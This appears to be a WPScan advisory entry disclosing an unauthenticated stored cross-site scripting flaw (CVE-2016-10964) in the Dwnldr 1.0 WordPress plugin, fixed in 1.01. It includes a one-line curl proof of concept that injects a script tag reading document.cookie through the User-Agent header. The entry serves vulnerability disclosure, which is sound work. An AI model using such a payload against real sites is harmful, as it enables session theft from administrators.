Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)



Description
User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed.
Proof of Concept
curl -A "User-Agent: <script>alert(document.cookie);</script>" -O http://<target>/?attachment_id=<attachment id>  

Affects Plugin

fixed in version 1.01

References

CVE 2016-10964
URL https://rastating.github.io/dwnldr-1-0-stored-xss-disclosure

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Rob Carr
Submitter Website http://blog.rastating.com/
Submitter Twitter iamrastating
Views 6884
Verified No
WPVDB ID 8556

Timeline

Publicly Published 2016-07-18 (almost 4 years ago)
Added 2016-07-19 (almost 4 years ago)
Last Updated 2019-11-28 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin